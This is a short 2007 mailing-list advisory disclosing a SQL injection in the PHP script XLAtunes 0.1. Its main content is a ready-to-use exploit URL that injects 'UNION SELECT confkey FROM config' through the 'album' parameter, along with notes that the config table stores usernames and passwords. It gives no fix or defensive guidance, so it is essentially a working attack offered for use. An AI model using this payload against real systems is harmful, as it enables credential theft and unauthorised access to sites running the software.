XLAtunes 0.1 (album) Remote SQL Injection Vulnerability
To: [email protected]
Subject: XLAtunes 0.1 (album) Remote SQL Injection Vulnerability
From: [email protected]
Reply-To: [email protected]
X-Mailer: PHP/4.3.10
X-enterto-header: passed
X-enterto-header2: [email protected]
Content-Type: text/plain;;
Content-Transfer-Encoding:
Message-Id: <E1HJs76-000JTu-4g@mail.enterto.com.>
Date: Wed, 21 Feb 2007 06:06:32 -0800
X-Virus-Scanned: antivirus-gw at tyumen.ru
#Critical Status:High
#Found By: 0x90 #Download:http://www.scriptdungeon.com/script.php?ScriptID=2844
#Greetz:all my friends
#confkey->Password
#confvalue->Username
#Table:config
#http://host.com/path/?mode=view&album=-1%20UNION%20SELECT%20confkey%20FROM%20config/*